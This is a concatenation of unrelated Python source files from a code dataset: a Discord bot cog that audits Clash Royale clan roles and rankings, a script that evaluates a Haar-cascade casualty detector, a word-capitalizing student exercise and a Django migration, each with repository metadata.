ctx.invoke(self.racfaudit_config) await self.bot.type() clan_filters = [] if pargs.clan: clan_filters = pargs.clan result = await self.run_racfaudit(server, clan_filters=clan_filters) for page in pagify('\n'.join(result.output)): await self.bot.say(page) if pargs.exec: channel = ctx.message.channel await self.bot.type() if result.error: await self.bot.send(channel, "Audit aborted because of Clash Royale API error.") else: await self.exec_racf_audit(channel=channel, audit_results=result.audit_results, server=server) await self.bot.say("Audit finished.") async def run_racfaudit(self, server: discord.Server, clan_filters=None) -> AuditResult: """Run audit and return results.""" default_audit_results = { "elder_promotion_req": [], "coleader_promotion_req": [], "leader_promotion_req": [], "no_discord": [], "no_clan_role": [], "no_member_role": [], "not_in_our_clans": [], } audit_results = default_audit_results.copy() error = False out = [] try: member_models = await self.family_member_models() except ClashRoyaleAPIError as e: # await self.bot.say(e.status_message) error = True else: out.append("**RACF Family Audit**") # soemthing went wrong e.g. clash royale error if member_models: # associate Discord user to member for member_model in member_models: tag = clean_tag(member_model.get('tag')) try: discord_id = self.players[tag]["user_id"] except KeyError: pass else: member_model['discord_member'] = server.get_member(discord_id) # find member_models mismatch discord_members = [] for member_model in member_models: has_discord = member_model.get('discord_member') if has_discord is None: audit_results["no_discord"].append(member_model) if has_discord: discord_member = member_model.get('discord_member') discord_members.append(discord_member) # promotions is_elder = False is_coleader = False is_leader = False for r in discord_member.roles: if r.name.lower() == 'elder': is_elder = True if r.name.lower() == 'coleader': is_coleader = True if r.name.lower() == 'leader': is_leader = True if is_elder: if member_model.get('role').lower() != 'elder': audit_results["elder_promotion_req"].append(member_model) if is_coleader: if member_model.get('role').lower() != 'coleader': audit_results["coleader_promotion_req"].append(member_model) if is_leader: if member_model.get('role').lower() != 'leader': audit_results["leader_promotion_req"].append(member_model) # no clan role clan_name = member_model['clan']['name'] clan_role_name = self.clan_roles[clan_name] if clan_role_name not in [r.name for r in discord_member.roles]: audit_results["no_clan_role"].append({ "discord_member": discord_member, "member_model": member_model }) # no member role discord_role_names = [r.name for r in discord_member.roles] if 'Member' not in discord_role_names: audit_results["no_member_role"].append(discord_member) # find discord member with roles for user in server.members: user_roles = [r.name for r in user.roles] if 'Member' in user_roles: if user not in discord_members: audit_results['not_in_our_clans'].append(user) # show results def list_member(member_model): """member row""" clan = member_model.get('clan') clan_name = None if clan is not None: clan_name = clan.get('name') row = "**{name}** #{tag}, {clan_name}, {role}, {trophies}".format( name=member_model.get('name'), tag=member_model.get('tag'), clan_name=clan_name, role=get_role_name(member_model.get('role')), trophies=member_model.get('trophies') ) return row for clan in self.config['clans']: display_output = False clan_name_filters = [] for f in clan.get('filters', []): clan_name_filters.append(str(f).lower()) if clan_filters: for c in clan_filters: if str(c).lower() in clan_name_filters: display_output = True else: display_output = True if not display_output: continue if clan['type'] == 'Member': out.append("-" * 40) out.append(inline(clan.get('name'))) # no discord out.append(underline("Members without discord")) for member_model in audit_results["no_discord"]: try: if member_model['clan']['name'] == clan.get('name'): out.append(list_member(member_model)) except KeyError: pass # elders out.append(underline("Elders need promotion")) for member_model in audit_results["elder_promotion_req"]: try: if member_model['clan']['name'] == clan.get('name'): out.append(list_member(member_model)) except KeyError: pass # coleaders out.append(underline("Co-Leaders need promotion")) for member_model in audit_results["coleader_promotion_req"]: try: if member_model['clan']['name'] == clan.get('name'): out.append(list_member(member_model)) except KeyError: pass # clan role out.append(underline("No clan role")) for result in audit_results["no_clan_role"]: try: if result["member_model"]['clan']['name'] == clan.get('name'): out.append(result['discord_member'].mention) except KeyError: pass # not in our clans out.append("-" * 40) out.append(underline("Discord users not in our clans but with member roles")) for result in audit_results['not_in_our_clans']: out.append('`{}` {}'.format(result, result.id)) else: out.append('Error from Clash Royale API. Aborting audit…') return AuditResult( audit_results=audit_results, output=out, error=error ) async def exec_racf_audit(self, channel: discord.Channel = None, audit_results=None, server=None): """Execute audit and output to specific channel.""" await self.bot.send_message(channel, "**RACF Family Audit**") await self.bot.send_typing(channel) async def exec_add_roles(d_member, roles, channel=None): # print("add roles", d_member, [r.name for r in roles]) # await asyncio.sleep(0) try: await self.bot.add_roles(d_member, *roles) except discord.DiscordException as e: pass else: if channel is not None: await self.bot.send_message(channel, "Add {} to {}".format(", ".join([r.name for r in roles]), d_member)) async def exec_remove_roles(d_member, roles, channel=None): # print("remove roles", d_member, [r.name for r in roles]) # await asyncio.sleep(0) try: await self.bot.remove_roles(d_member, *roles) except discord.DiscordException as e: pass else: if channel is not None: await self.bot.send_message(channel, "Remove {} from {}".format(", ".join([r.name for r in roles]), d_member)) # change clan roles for result in audit_results["no_clan_role"]: try: member_model = result['member_model'] discord_member = result['discord_member'] clan_role_name = self.clan_roles[member_model['clan']['name']] other_clan_role_names = [r for r in self.clan_roles.values() if r != clan_role_name] for rname in other_clan_role_names: role = discord.utils.get(discord_member.roles, name=rname) if role is not None: await exec_remove_roles(discord_member, [role], channel=channel) role = discord.utils.get(server.roles, name=clan_role_name) if role is not None: await exec_add_roles(discord_member, [role], channel=channel) except KeyError: pass # Add member role member_role = discord.utils.get(server.roles, name='Member') for discord_member in audit_results["no_member_role"]: try: if member_role is not None: await exec_add_roles(discord_member, [member_role], channel=channel) except KeyError: pass # remove member roles from people who are not in our clans for result in audit_results['not_in_our_clans']: result_role_names = [r.name for r in result.roles] # ignore people with special if 'Special' in result_role_names: continue if 'Keep-Member' in result_role_names: continue if 'Leader-Emeritus' in result_role_names: continue if 'FamilyLead' in result_role_names: continue if 'BS-FamilyLead' in result_role_names: continue if 'Bot Commander' in result_role_names: continue if 'MOD' in result_role_names: continue to_remove_role_names = [] for role_name in MEMBER_ROLE_NAMES: if role_name in result_role_names: to_remove_role_names.append(role_name) to_remove_roles = [discord.utils.get(server.roles, name=rname) for rname in to_remove_role_names] to_remove_roles = [r for r in to_remove_roles if r is not None] if len(to_remove_roles): await exec_remove_roles(result, to_remove_roles, channel=channel) # if visitor_role is not None: # await exec_add_roles(result, [visitor_role], channel=channel) # Remove clan roles from visitors member_role = discord.utils.get(server.roles, name='Member') server_members = list(server.members).copy() for user in server_members: # not a member if member_role not in user.roles: user_role_names = [r.name for r in user.roles] user_member_role_names = set(user_role_names) & set(MEMBER_ROLE_NAMES) # union of user roles with member role names -> user has member roles which need to be removed if user_member_role_names: to_remove_roles = [discord.utils.get(server.roles, name=rname) for rname in user_member_role_names] to_remove_roles = [r for r in to_remove_roles if r is not None] if to_remove_roles: try: await exec_remove_roles(user, to_remove_roles, channel=channel) except Exception as e: pass await self.bot.send_message(channel, "Audit finished.") async def search_player(self, tag=None, user_id=None): """Search for players. Return player dict {'tag': '200CYRVCU', 'user_id': '295317904633757696', 'user_name': 'Ryann'} """ if tag is not None: for key, player in self.players.items(): if player.get('tag') == tag: return player if user_id is not None: for key, player in self.players.items(): if player.get('user_id') == user_id: return player return None @racfaudit.command(name="audit", pass_context=True) async def audit_member(self, ctx, member: discord.Member): """Run audit against specific user.""" try: player = await self.search_player(user_id=member.id) if player is None: raise NoPlayerRecord() tag = player.get('tag') if tag is None: raise NoPlayerRecord() except NoPlayerRecord as e: await self.bot.say("Your tag is not set. Please ask a Co-Leader for help.") return racf = self.bot.get_cog("RACF") await ctx.invoke(racf.racf_verify, member, tag) @commands.command(name="auditme", pass_context=True) async def audit_self(self, ctx): """Run audit against self.""" author = ctx.message.author try: player = await self.search_player(user_id=author.id) if player is None: raise NoPlayerRecord() tag = player.get('tag') if tag is None: raise NoPlayerRecord() except NoPlayerRecord as e: await self.bot.say("Your tag is not set. Please ask a Co-Leader for help.") return racf = self.bot.get_cog("RACF") await ctx.invoke(racf.racf_verify, author, tag, grant_permission=True) @racfaudit.command(name="rank", pass_context=True) async def racfaudit_rank(self, ctx, *names): """Look up member rank within the family. Options: -startswith search names from the start only -link link to profiles -mini exclude mini clan """ await self.bot.type() try: member_models = await self.family_member_models() except ClashRoyaleAPIError as e: await self.bot.say(e.status_message) return results = [] member_models = sorted(member_models, key=lambda x: x['trophies'], reverse=True) option_startwith = '-startswith' in names option_link = '-link' in names option_mini = '-mini' in names if option_startwith: names = list(names) names.remove('-startswith') if option_mini: member_models = [m for m in member_models if m.get('clan', {}).get('tag') != '#9R8G9290'] for index, member_model in enumerate(member_models, 1): # simple search for name in names: add_it = False if name.lower() in member_model.get('name').lower(): if option_startwith: m_name = member_model.get('name', '').lower() # strip color code m_name = re.sub(r'^(\<.+\>)', '', m_name) # strip all non alphanumeric characters m_name = ''.join(re.findall(r'[a-z0-9]+', m_name)) if m_name.startswith(name): add_it = True else: add_it = True else: # unidecode search s = unidecode.unidecode(member_model.get('name')) s = ''.join(re.findall(r'\w', s)) if name.lower() in s.lower(): add_it = True if add_it: results.append({ 'index': index, 'member': member_model, 'clan_name': member_model.get('clan', {}).get('name', '') }) limit = 20 if len(results) > limit: await self.bot.say("More than {0} results found, showing top {0}…".format(limit)) results = results[:limit] if results: em = await self.result_embed(results, option_link=option_link) await self.bot.say(embed=em) else: await self.bot.say("No results") async def result_embed(self, results, option_link=False, groups_of=5): """Format a list of member models into a single embed.""" em = discord.Embed( title="RoyaleAPI Clan Family", url="https://royaleapi.com/f/royaleapi", color=discord.Color.blue() ) result_groups = grouper(groups_of, results) for group_id, group in enumerate(result_groups): out = [] for result in group: if not result: continue index = result['index'] member = result['member'] member_name = member.get('name', '') trophies = member.get('trophies', 0) clan_name = result.get('clan_name', '') links = '' if option_link: tag = member.get('tag', '') links = ( '\n' '[Profile](https://royaleapi.com/player/{tag})' ' • [Log](https://royaleapi.com/player/{tag}/battles)' ' • [Decks](https://royaleapi.com/player/{tag}/decks)' ).format(tag=tag) line = '`\u2800{rank: >3} {trophies:<4}\u2800`**{member_name}** {clan_name} {links}'.format( rank=index, member_name=member_name, clan_name=clan_name, trophies=trophies, links=links, ) result['line'] = line result['links'] = links out.append(line) r_index_first = group_id * groups_of + 1 r_index_last = r_index_first + len(out) - 1 field_name = "{} - {}".format(r_index_first, r_index_last) em.add_field( name=field_name, value='\n'.join(out), inline=False ) return em @commands.command(name="racfaudit_top", aliases=["rtop"], pass_context=True) async def racfaudit_top(self, ctx, count: int): """Show top N members in family.""" await self.bot.type() try: member_models = await self.family_member_models() except ClashRoyaleAPIError as e: await self.bot.say(e.status_message) return author = ctx.message.author if not author.server_permissions.manage_roles: count = min(count, 10) member_models = sorted(member_models, key=lambda x: x['trophies'], reverse=True) results = [] for index, m in enumerate(member_models[:count]): r = dict( index=index + 1, member=m, clan_name=m.get('clan', {}).get('name', '') ) results.append(r) if results: em = await self.result_embed(results) await self.bot.say(embed=em) else: await self.bot.say("No results") @racfaudit.command(name="csv", pass_context=True) async def racfaudit_csv(self, ctx): """Output membership in CSV format.""" await self.bot.type() try: member_models = await self.family_member_models() except ClashRoyaleAPIError as e: await self.bot.say(e.status_message) return filename = "members-{:%Y%m%d-%H%M%S}.csv".format(dt.datetime.utcnow()) tmp_file = os.path.join("data", "racf_audit", "member_csv.csv") fieldnames = [ 'name', 'tag', 'role', 'expLevel', 'trophies', 'clan_tag', 'clan_name', 'clanRank', 'previousClanRank', 'donations', 'donationsReceived', ] members = [] for model in member_models: member = {k: v for k, v in model.items() if k in fieldnames} member['clan_tag'] = clean_tag(model.get('clan', {}).get('tag', '')) member['clan_name'] = model.get('clan', {}).get('name', '') member['tag'] = clean_tag(model.get('tag', '')) members.append(member) channel = ctx.message.channel with io.StringIO() as f: writer = csv.DictWriter(f, fieldnames=fieldnames) writer.writeheader() for member in members: writer.writerow(member) s = f.getvalue() with io.BytesIO(s.encode()) as fb: await self.bot.send_file( channel, fb, filename=filename) def calculate_clan_trophies(self, trophies): """Add a list of trophies to be calculated.""" trophies = sorted(trophies, reverse=True) total = 0 factors = OrderedDict({ 10: 0.5, 20: 0.25, 30: 0.12, 40: 0.1, 50: 0.03 }) for index, t in enumerate(trophies, 1): factor_list = [f for f in factors.keys() if index <= f] if len(factor_list) > 0: factor = min(factor_list) total += t * factors[factor] return int(total) @racfaudit.command(name="season", pass_context=True) async def racfaudit_season(self, ctx, *args): """Find top 50 RACF not in Alpha.""" await self.bot.type() server = ctx.message.server author = ctx.message.author try: member_models = await self.family_member_models() except ClashRoyaleAPIError as e: await self.bot.say(e.status_message) return top50_results = [] non_top50_results = [] ALPHA_CLAN_TAG = '#9PJ82CRC' # ALPHA_CLAN_TAG = '#PV98LY0P' member_models = sorted(member_models, key=lambda x: x['trophies'], reverse=True) alpha_trophies = [m.get('trophies') for m in member_models if m.get('clan', {}).get('tag') == ALPHA_CLAN_TAG] alpha_clan_trophies = self.calculate_clan_trophies(alpha_trophies) top50_trophies = [m.get('trophies') for m in member_models[:50]] top50_clan_trophies = self.calculate_clan_trophies(top50_trophies) trophy_50 = int(member_models[49].get('trophies', 0)) # Find alpha rank if top 50 in alpha api = ClashRoyaleAPI(self.auth) alpha_global_rank = 0 possible_alpha_rank = 0 ranks = [] try: lb = await api.fetch_clan_leaderboard() except ClashRoyaleAPIError as e: await self.bot.say("Error: {}".format(e.message)) else: items = lb.get('items', []) for item in items: if item.get('tag') == ALPHA_CLAN_TAG: alpha_global_rank = item.get('rank') clan_scores = [item.get('clanScore') for item in items] possible_alpha_rank = len([score for score in clan_scores if score > top50_clan_trophies]) # Summary o_summary = [ '50th = {:,} :trophy: '.format(trophy_50), 'Alpha Clan Trophies: {:,} :trophy:'.format(alpha_clan_trophies), 'Global Rank: {:,}'.format(alpha_global_rank), 'Top 50 Clan Trophies: {:,} :trophy:'.format(top50_clan_trophies), 'Possible Rank: {:,}'.format(possible_alpha_rank), ] # await self.bot.say('\n'.join(o)) # logic calc for index, member_model in enumerate(member_models, 1): # non alpha in top 50 clan_tag = member_model.get('clan', {}).get('tag') if index == 50: trophy_50 = member_model.get('trophies') if index <= 50: if clan_tag != ALPHA_CLAN_TAG: top50_results.append({ 'index': index, 'member': member_model, }) # alphas not in top 50 else: if clan_tag == ALPHA_CLAN_TAG: non_top50_results.append({ 'index': index, 'member': member_model }) def append_result(result, out, out_members): index = result['index'] member = result['member'] clan_name = member.get('clan', {}).get('name').replace('RoyaleAPI', '').strip() trophies = member.get('trophies') delta = trophies - trophy_50 if delta > 0: delta = '+{}'.format(delta) elif delta == 0: delta = ' {}'.format(delta) line = '`\u2800{rank: >3} {trophies:<4}\u2800`**{member}** {clan_name} {delta:<4}'.format( rank=index, member=member.get('name')[:15], clan_name=clan_name, trophies=trophies, delta=delta ) out.append(line) out_members.append(member) # top 50 not in alpha # out = ['Top 50 not in Alpha'] out = [] out_members = [] for result in top50_results: append_result(result, out, out_members) # for page in pagify('\n'.join(out)): # await self.bot.say(box(page, lang='py')) # alphas not in top 50 # out_2 = ['Alphas not in top 50'] out_2 = [] out_2_members = [] for result in non_top50_results: append_result(result, out_2, out_2_members) # for page in pagify('\n'.join(out_2)): # await self.bot.say(box(page, lang='py')) # embed display em = discord.Embed( title="End of season", description="\n".join(o_summary), color=discord.Color.blue() ) em.add_field( name="Top 50 not in Alpha", value='\n'.join(out), inline=False ) em.add_field( name="Alphas not in Top 50", value='\n'.join(out_2), inline=False ) await self.bot.say(embed=em) def append_discord_member(member_list, member): tag = clean_tag(member.get('tag')) try: discord_id = self.players[tag]["user_id"] except KeyError: pass else: discord_member = server.get_member(discord_id) if discord_member is not None: member_list.append(discord_member) # options for output mentions if 'Bot Commander' in [r.name for r in author.roles]: top50_discord_members = [] non_top50_discord_members = [] for member in out_members: append_discord_member(top50_discord_members, member) for member in out_2_members: append_discord_member(non_top50_discord_members, member) if '-id' in args: out = ['Top 50 not in Alpha'] for discord_member in top50_discord_members: out.append(discord_member.id) out.append('Alphas not in Top 50') for discord_member in non_top50_discord_members: out.append(discord_member.id) for page in pagify('\n'.join(out)): await self.bot.say(box(page, lang='py')) if '-mention' in args: out = [] for discord_member in top50_discord_members: out.append(discord_member.mention) out.append( 'Congratulations! You are top 50 in the RACF. ' 'Please move to Alpha by end of season to help us with the global rank!' ) for discord_member in non_top50_discord_members: out.append(discord_member.mention) out.append( 'You are not within top 50 in the RACF right now. ' 'Please move to Bravo unless you are certain that you can un-tilt.' ) out.append( '\n\nNote: If you are _very_ close to where the 50th is, you can stay put. ' 'Just be conscious of that number. Thank you! :heart:' ) for page in pagify(' '.join(out)): await self.bot.say(page) @racfaudit.command(name="auto", pass_context=True, no_pm=True) @checks.admin_or_permissions(manager_server=True) async def racfaudit_auto(self, ctx, channel: discord.Channel = None): """Auto audit server""" server = ctx.message.server enabled = channel is not None channel_id = None if channel is not None: channel_id = channel.id if not self.settings.get('auto_audit_servers'): self.settings['auto_audit_servers'] = dict() self.settings['auto_audit_servers'][server.id] = dict( enabled=enabled, channel_id=channel_id ) dataIO.save_json(JSON, self.settings) if enabled: await self.bot.say("Auto audit enabled") else: await self.bot.say("Auto audit disabled") async def run_audit_task(self): """Auto run audit.""" for server_id, v in self.settings.get('auto_audit_servers', {}).items(): if server_id in [RACF_SERVER_ID, SML_SERVER_ID]: channel_id = v.get('channel_id') enabled = v.get('enabled') if enabled: channel = self.bot.get_channel(channel_id) server = self.bot.get_server(server_id) if channel is not None: try: result = await self.run_racfaudit(server) except ClashRoyaleAPIError: pass else: if result.error: await self.bot.send(channel, "Audit aborted because of Clash Royale API error.") else: await self.exec_racf_audit(channel=channel, audit_results=result.audit_results, server=server) @racfaudit.command(name="nudge", pass_context=True, no_pm=True) @checks.mod_or_permissions(kick_members=True) async def racfaudit_nudge(self, ctx, query): """Nudge members for CW battles.""" api = ClashRoyaleAPI(self.auth) server = ctx.message.server # find clan tag based on config filters tag = None for clan in self.config.get('clans'): if query.lower() in [f.lower() for f in clan.get('filters', [])]: tag = clan.get('tag') break if tag is None: await self.bot.say("Cannot find clan tag") return await self.bot.say("Clan tag: {}".format(tag)) cw = await api.fetch_clan_war(tag) cwd = Dict(cw) c = await api.fetch_clan(tag) cd = Dict(c) # tag to member name member_tag_to_name = {clean_tag(m.get('tag', '')): m.get('name', '') for m in cd.memberList} # helper: send message async def send_message(war_day="Collection Day", timedelta_human="0 minutes", discord_users=None): if discord_users: msg = "{mentions} {timedelta} til end of {war_day} and you have battles remaining!!".format( war_day=war_day, mentions=" ".join([u.mention for u in discord_users]), timedelta=timedelta_human, member_tags=", ".join(member_tags) ) await self.bot.say(msg) if war_day == 'War Day': await self.bot.say("Note: we cannot detect members who have more than one battle to play.") # helper: not on discord: async def send_not_on_discord(member_tag): await self.bot.say( "{member_name} #{member_tag} is not on Discord.".format( member_name=member_tag_to_name.get(member_tag, ''), member_tag=member_tag ) ) # collection day nudge now = dt.datetime.utcnow() member_tags = [] if cwd.state == 'collectionDay': # time remaining end_time = dt.datetime.strptime(cwd.collectionEndTime, '%Y%m%dT%H%M%S.%fZ') # end_time = dt.datetime.strptime('20190126T102716.230Z', '%Y%m%dT%H%M%S.%fZ') timedelta = end_time - now minutes = timedelta // dt.timedelta(minutes=1) timedelta_human = "{}".format(humanfriendly.format_timespan(dt.timedelta(minutes=minutes).total_seconds())) # battle remaining for p in cwd.participants: if p.collectionDayBattlesPlayed != 3: member_tags.append(clean_tag(p.tag)) # not yet participating participant_tags = [p.get('tag') for p in cwd.participants] for m in cd.memberList: if m.get('tag') not in participant_tags: member_tags.append(clean_tag(m.get('tag'))) # discord user discord_users = [] tag2discord = {v.get('tag'): v.get('user_id') for k, v in self.players.items()} for member_tag in member_tags: if member_tag in tag2discord: discord_id = tag2discord.get(member_tag) discord_user = server.get_member(discord_id) if discord_user is not None: discord_users.append(discord_user) else: await send_not_on_discord(member_tag) else: await send_not_on_discord(member_tag) await send_message(war_day="Collection Day", timedelta_human=timedelta_human, discord_users=discord_users) return if cwd.state == 'warDay': # time remaining end_time = dt.datetime.strptime(cwd.warEndTime, '%Y%m%dT%H%M%S.%fZ') timedelta = end_time - now minutes = timedelta // dt.timedelta(minutes=1) timedelta_human = "{}".format(humanfriendly.format_timespan(dt.timedelta(minutes=minutes).total_seconds())) # battles remaining for p in cwd.participants: if p.battlesPlayed == 0: member_tags.append(clean_tag(p.tag)) # discord user players = [self.players.get(member_tag) for member_tag in member_tags] players = [p for p in players if p] discord_users = [] for player in players: discord_id = player.get('user_id') discord_user = server.get_member(discord_id) if discord_user is None: member_tag = player.get('tag') await send_not_on_discord(member_tag) else: discord_users.append(discord_user) await send_message(war_day="War Day", timedelta_human=timedelta_human, discord_users=discord_users) return if cwd.state.lower() == 'matchmaking': await self.bot.say("Clan is matchmaking… aborted.") return if cwd.state.lower() == 'notinwar': await self.bot.say("Clan is not in war… aborted.") return # not in war or collection await self.bot.say("Clan is not in a known war state… aborted.") def check_folder(): """Check folder.""" os.makedirs(PATH, exist_ok=True) os.makedirs(os.path.join(PATH, "clans"), exist_ok=True) def check_file(): """Check files.""" if not dataIO.is_valid_json(JSON): dataIO.save_json(JSON, {}) def setup(bot): """Setup.""" check_folder() check_file() n = RACFAudit(bot) bot.add_cog(n)
5b05fd125f8e4a01b95fc570dc9749b52d706066
dc8809c77c53af6b9e5f66f52fe9d8e9e32ece51
/finalCDSTest.py
51b7a48e9f5374683351c66ed3f1a98a52c8765b
[]
no_license
psykodan/FYP
afb2263e862aad0640722fcd546a39a73653c79a
6cba87fab509a78355e20f177192bfcc148c2918
refs/heads/master
2021-05-10T13:05:18.635337
2018-05-04T12:54:21
2018-05-04T12:54:21
118,461,257
0
0
null
null
null
null
UTF-8
Python
false
false
6,127
py
import numpy as np import cv2 import os from advancedHaarColourThreshold import casualtyDetectionImageStream def main(): holdoutSets=[] holdoutSets.append("/home/daniel/Documents/FYP/FYP/data/CloudyChopSurfFanore/holdout/1/positive/") holdoutSets.append("/home/daniel/Documents/FYP/FYP/data/CloudyChopSurfFanore/holdout/2/positive/") holdoutSets.append("/home/daniel/Documents/FYP/FYP/data/CloudyChopSurfFanore/holdout/3/positive/") haar = "cascade.xml" cascade = cv2.CascadeClassifier(haar) objectLocations = [] objectLocations.append("/home/daniel/Documents/FYP/FYP/data/CloudyChopSurfFanore/holdout/1/info.dat") objectLocations.append("/home/daniel/Documents/FYP/FYP/data/CloudyChopSurfFanore/holdout/2/info.dat") objectLocations.append("/home/daniel/Documents/FYP/FYP/data/CloudyChopSurfFanore/holdout/3/info.dat") threshold = 3.6 box = 40 #Iterate through confidence thresholds 0 - 5 for hSetNum in range(len(holdoutSets)): casualtyDetectionImageStream(holdoutSets[hSetNum], cascade, threshold, box) processResults(objectLocations[hSetNum], holdoutSets[hSetNum]) def processResults(info, dirIn): tp = 0 fp = 0 tn = 0 fn = 0 p = 0 n = 0 #opening and processing the created results file and the info.dat file that specifies where the objects actually are r = open('results.txt', 'r') results = r.read() r.close() resRows = results.split('\n') resFormatted = [] for i in resRows: resFormatted.append(i.split(' ')) d = open(info, 'r') data = d.read() d.close() dataRows = data.split('\n') dataFormatted = [] for j in dataRows: dataFormatted.append(j.split(' ')) images = [] #go through each image in the info.dat file checking against every correspoding detection in the results file for x in dataFormatted: if(len(x) != 1): images.append(x[0]) p = p + int(x[1]) for y in resFormatted: if(y[0] == x[0]): #if the image from the results file is the same image from info.dat if(y[1] == "NONE"): #If the result is a NONE this is a false negative as the info.dat wouldn't have an entry for a negative fn = fn + 1 elif(int(x[1])==1): #Check x y coords of box are within 50 pixels for 1 object if((int(y[1]) >= (int(x[2]) - 50) and int(y[1]) <= (int(x[2]) + 50)) and (int(y[2]) >= (int(x[3]) - 50) and int(y[2]) <= (int(x[3]) + 50))): tp = tp + 1 else: fp = fp + 1 elif(int(x[1])==2): #Check x y coords of box are within 50 pixels for 1 object if((int(y[1]) >= (int(x[2]) - 50) and int(y[1]) <= (int(x[2]) + 50)) and (int(y[2]) >= (int(x[3]) - 50) and int(y[2]) <= (int(x[3]) + 50))): tp = tp + 1 #Check x y coords of box are within 50 pixels for 1 object elif((int(y[1]) >= (int(x[6]) - 50) and int(y[1]) <= (int(x[6]) + 50)) and (int(y[2]) >= (int(x[7]) - 50) and int(y[2]) <= (int(x[7]) + 50))): tp = tp + 1 else: fp = fp + 1 elif(int(x[1])==3): #Check x y coords of box are within 50 pixels for 1 object if((int(y[1]) >= (int(x[2]) - 50) and int(y[1]) <= (int(x[2]) + 50)) and (int(y[2]) >= (int(x[3]) - 50) and int(y[2]) <= (int(x[3]) + 50))): tp = tp + 1 #Check x y coords of box are within 50 pixels for 1 object elif((int(y[1]) >= (int(x[6]) - 50) and int(y[1]) <= (int(x[6]) + 50)) and (int(y[2]) >= (int(x[7]) - 50) and int(y[2]) <= (int(x[7]) + 50))): tp = tp + 1 #Check x y coords of box are within 50 pixels for 1 object elif((int(y[1]) >= (int(x[10]) - 50) and int(y[1]) <= (int(x[10]) + 50)) and (int(y[2]) >= (int(x[11]) - 50) and int(y[2]) <= (int(x[11]) + 50))): tp = tp + 1 else: fp = fp + 1 else: print("nothing to see here") for z in resFormatted: if(len(z) != 1): if(z[1]=="NONE" and z[0] not in images): #If the results file says NONE and there is no entry in the info.dat file then this is a true negative tn = tn +1 if(z[1] != "NONE" and z[0] not in images): #If the results file doesn't say NONE and there is no entry in the info.dat file then this is a false positive that wouldn't have been picked up above fp = fp +1 count = len([name for name in os.listdir(dirIn) if os.path.isfile(os.path.join(dirIn, name))]) n = count - len(dataFormatted) #Metrics if((tp+fp+fn+tn)!= 0): accuracy = (tp + tn)/(tp+fp+fn+tn) else: accuracy = 0 if((tp+fp) != 0): precision = tp/(tp+fp) else: precision = 0 if((tp+fn) != 0): sensitivity = tp/(tp+fn) else: sensitivity = 0 if((tn+fp) != 0): specificity = tn/(tn+fp) else: specificity = 0 print("True positive count: " + str(tp)) print("False positive count: "+ str(fp)) print("True negative count: "+ str(tn)) print("False negative count: "+ str(fn)) print("Positive count: "+ str(p)) print("Negative count: "+ str(n)) #Writing results to file rF = open('resultsFull.txt', 'a') rF.write("Confusion Matrix for black Colour Thresholding\n") rF.write(" Actual \n") rF.write(" \n") rF.write(" P("+str(p)+") N("+str(n)+")\n") rF.write("P --------------------\n") rF.write("r P | ["+str(tp)+"] | ["+str(fp)+"] |\n") rF.write("e ("+str(int(tp + fp))+") -------------------\n") rF.write("d N | ["+str(fn)+"] | ["+str(tn)+"] |\n") rF.write(" ("+str(int(tn + fn))+") -------------------\n\n") rF.write("Accuracy = " + str(accuracy) + "\n") rF.write("Precision = " + str(precision) + "\n") rF.write("Sensitivity = " + str(sensitivity) + "\n") rF.write("Specificity = " + str(specificity) + "\n") rF.write("-------------- NEXT RUN ------------\n") rF.close() rR = open('resultsRaw.txt', 'a') rR.write(str(p) +","+ str(n) +","+ str(tp) +","+ str(tn) +","+ str(fp) +","+ str(fn) +","+ str(accuracy) +","+ str(precision) +","+ str(sensitivity) +","+ str(specificity) +"\n" ) rR.close() r = open('results.txt','w') r.write("") r.close() main()
703c14122a9d7e68d954f28abd98d67fb76e61b7
b7eed26cf8a0042a61f555eed1e9bf0a3227d490
/students/medrek_tomasz/lesson_06_dicts_tuples_sets_args_kwargs/uppercase.py
5b34196d30840304fa45a907fd4681223a0cee82
[]
no_license
jedzej/tietopythontraining-basic
e8f1ac5bee5094c608a2584ab19ba14060c36dbe
a68fa29ce11942cd7de9c6bbea08fef5541afa0f
refs/heads/master
2021-05-11T11:10:05.110242
2018-08-20T12:34:55
2018-08-20T12:34:55
118,122,178
14
84
null
2018-08-24T15:53:04
2018-01-19T12:23:02
Python
UTF-8
Python
false
false
604
py
#!/usr/bin/env python3 def capitalize(lower_case_word): first_letter_no = ord(lower_case_word[0:1]) if first_letter_no in range(ord('a'), ord('z') + 1): return chr(first_letter_no - 32) + lower_case_word[1:] else: return lower_case_word def capitalize_message(message): output = ' ' words_list = [] for word in message.split(): words_list += [capitalize(word)] return output.join(words_list) def main(): input_message = input("Please enter your message\n") print(capitalize_message(input_message)) if __name__ == "__main__": main()
09f5a82abfe71544df6b67e4dceb7dd68152b887
4b2ed102f94d4e96a423300c789d31d49e6ee3cb
/app/rrhh/migrations/0005_alter_detallerolpersonal_options.py
2423db787f8e3b7d271329466ee6dcfda0481d84
[]
no_license
peilflores/controlasistencia
34fedda4f052d8892eca328687ce5718dcb86266
dcb99e2687d32abe896c66c68719bc3d8296b7f1
refs/heads/main
2023-06-05T01:56:13.466041
2021-06-30T06:56:50
2021-06-30T06:56:50
381,582,563
0
0
null
null
null
null
UTF-8
Python
false
false
424
py
# Generated by Django 3.2 on 2021-06-21 04:51 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('rrhh', '0004_alter_detallerol_rol'), ] operations = [ migrations.AlterModelOptions( name='detallerolpersonal', options={'verbose_name': 'Detalle Rol Personal', 'verbose_name_plural': 'Detalles Roles Personales'}, ), ]
efcad0606abc2253c9cdfa4e89175cfb0feee50e
ebdc72111b5140919e8ac7736c597e33e31b190b
/ImprovedVersion/comparison.py
fa27d4806b8c72c41c4f68bf93bb208859c73d28
[]
no_license
lordChipotle/ML-SIM-Improved
c031ee733b65d083f585fa73f806494b8550a48c
e756b6e427af37c25a4eacd761510880e43023d2
refs/heads/master
2023-01-07T12:43:45.451340
2020-11-05T15:09:34
2020-11-05T15:09:34
280,270,221
0
0
null
null
null
null
UTF-8
Python
false
false
18,322
py
